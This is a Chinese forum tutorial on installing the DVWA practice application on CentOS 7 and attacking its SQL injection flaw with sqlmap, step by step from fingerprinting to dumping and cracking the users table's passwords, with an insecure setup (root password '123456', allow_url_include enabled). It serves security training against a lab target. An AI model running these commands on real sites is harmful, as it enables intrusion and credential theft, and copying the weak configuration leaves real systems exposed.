设为首页 收藏本站
查看: 1188|回复: 0

[经验分享] CentOS 7 通过SQLmap进行SQL注入

[复制链接]
发表于 2019-4-17 16:18:08 | 显示全部楼层 |阅读模式
  安装SQLmap: IP:a.b.c.d
  ***测试演练系统DVWA: IP:a.b.c.d
  通过SQLmap检测SQL注入漏洞 :
  1.安装SQLmap漏洞查看工具
  2.安装***测试演练系统DVWA
  3.使用SQLmap进行sql注入并获得后台管理员adnim帐号和密码
  sql注入概述:
  所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
  它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库
  比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式***
  比如 :12306.cn  帐号和密码泄露
  什么是SQLmap?
  SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)
  官方网站下载 : http://sqlmap.org/
  安装sqlmap
  pip  install sqlmap
  测试
  sqlmap  --help

  DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
  官方网站:链接地址:http://www.dvwa.co.uk   网站是英国的 ,有时候访问外国的网站可能会打不开
  安装测试演练系统DVWA

  快速部署DVWA测试环境 , 搭建一个安全系数较低的网站
  [root@dvwa ~]# yum install -y httpd mysql-server mysql php php-mysql php-gd
  [root@dvwa ~]# systemctl start httpd
  [root@dvwa ~]# systemctl start mariadb
  php-gd库:gd库是php处理图形的扩展库,gd库提供了一系列用来处理图片的API,使用GD库可以处理图片,或者生成图片。 在网站上GD库通常用来生成缩略图或者用来对图片加水印或者对网站数据生成报表及验证码
  测试LAMP环境
  [root@dvwa ~]# vim /var/www/html/info.php
  

  [root@dvwa ~]# mysqladmin -u root password "123456"
  [root@dvwa ~]# mysql -u root -p123456
  #将下载的dvwa***系统代码上传到Linux上 ,并解压到网页根目录下
  [root@dvwa ~]# unzip DVWA-master.zip -d /var/www/html/
  [root@dvwa ~]# ls /var/www/html/
  1.php  DVWA-master
  [root@dvwa ~]# chown -R apache.apache /var/www/html/DVWA-master/
  #编辑/dvwa/config/config.inc.php , 配置数据库信息 ,user和password是MySQL的用户名和密码
  #cp配置文件模板
  [root@dvwa ~]# cp /var/www/html/DVWA-master/config/config.inc.php{.dist,}
  [root@dvwa ~]# vim /var/www/html/DVWA-master/config/config.inc.php
  $_DVWA[ 'db_server' ]   = '127.0.0.1';
  $_DVWA[ 'db_database' ] = 'dvwa';
  $_DVWA[ 'db_user' ]     = 'root';
  $_DVWA[ 'db_password' ] = '123456';  # 修改为mysql的root密码
  部署DVWA网站系统
  在浏览器中输入:http://ip/DVWA-master/setup.php
  解决环境问题
  [root@dvwa ~]# vim /etc/php.ini
  allow_url_include = Off  把Off改为On
  [root@dvwa ~]# systemctl restart httpd
  后期登录:
  http://ip/DVWA-master/login.php
  dvwa的登录界面的默认用户名和密码为admin和password
  到这DVMA就部署完了
  接下来就开始SQL注入了
  SQLmap探测sql注入漏洞 :
  1.枚举登录MYSQL数据的用户名与密码
  2.枚举所有数据库
  3.枚举指定数据库的数据表
  4.枚举指定数据表中的所有用户名与密码
  语法:SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等
  使用SQLmap之前我们得到需要当前会话cookies等信息,用来在***过程中维持连接状态,这里使用Firefox中名为“TamperData”的插件获取
  Tamper Data是一个用于跟踪和修改http/https请求和POST参数的扩展
  为方便演示,我们将DVWA安全等级设置为low
  接下来该轮到SQLmap登场了
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low' -b --current-db  --current-user
  使用选项:
  1、--cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
  2、-u : 指定目标URL,syql注入点
  3、-b : 获取DBMS banner (DBMS:Database Management System    数据库管理系统)
  4、--current-db : 获取当前数据库
  5、--current-user :获取当前用户
  中间会遇到几个选项,一路选择y就可以了
  1.使用命令用来枚举所有登录msyql数据库的用户名和密码hash值,后期可以对密码hash进行破解,生成明文密码
  2.枚举系统中所有的数据库名
  3.枚举dvwa数据表
  4.获取dvwa库中users表的所有列名字
  5.提取user表中的用户名与密码等信息。将用户与密码表中的所有用户名与密码dump出来
  cookie 和 sql注入点永远不变
  ==================================步骤1============================================
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low' --string="Surname" --users --password
  使用选项:
  1、--string : 当查询可用时用来匹配页面中的字符串
  2、--users : 枚举DBMS用户
  3、--password : 枚举DBMS用户密码hash
  ==================================步骤2============================================
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low' --dbs
  使用选项:
  --dbs: 枚举DBMS中的所有数据库
  ===================================步骤3============================================
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low'  -D dvwa  --tables
  使用选项:
  1、-D : 要枚举的DBMS数据库
  2、--tables     : 枚举DBMS数据库中的数据表
  ===================================步骤4============================================
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low'  -D dvwa  -T users --columns
  使用选项:
  -T : 要枚举的DBMS数据库表
  --columns : 枚举DBMS数据库表中的所有列
  ===================================步骤5============================================
  提取user表中的用户名与密码等信息。将用户与密码表中的所有用户名与密码dump出来
  [root@sqlmap ~]# sqlmap -u "http://ip/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low'  -D dvwa -T users -C user,password --dump
  使用选项:
  -T : 要枚举的DBMS数据表
  -C: 要枚举的DBMS数据表中的列
  --dump : 转储DBMS数据表项
  SQLmap会提问是否破解密码,按回车确认
  尽管我们用的数据库中密码是经过md5加密的,但是sqlmap可以导出sql数据,帮你解析成明文密码
  查看导出的数据 :
  [root@sqlmap ~]# cat /root/.sqlmap/output/ip/dump/dvwa/users.csv
  user,password
  1337,8d3533d75ae2c3966d7e0d4fcc69216b (charley)
  admin,5f4dcc3b5aa765d61d8327deb882cf99 (password)
  gordonb,e99a18c428cb38d5f260853678922e03 (abc123)
  pablo,0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)
  smithy,5f4dcc3b5aa765d61d8327deb882cf99 (password)
  到这我们就利用SQLmap***到一个有漏洞的网站 , 并获得了后台管理员admin的账号和密码
  实例:
  实验 简单的sql注入
  链接:http://ctf5.shiyanbar.com/web/index_3.php






  原文参考链接地址:
  https://www.cnblogs.com/bigdevilking/p/9420498.html
  https://blog.csdn.net/tututuo/article/details/80033868


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-828328-1-1.html 上篇帖子: CentOS Server版安装基础教程 下篇帖子: how to install nfs on centos 7
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表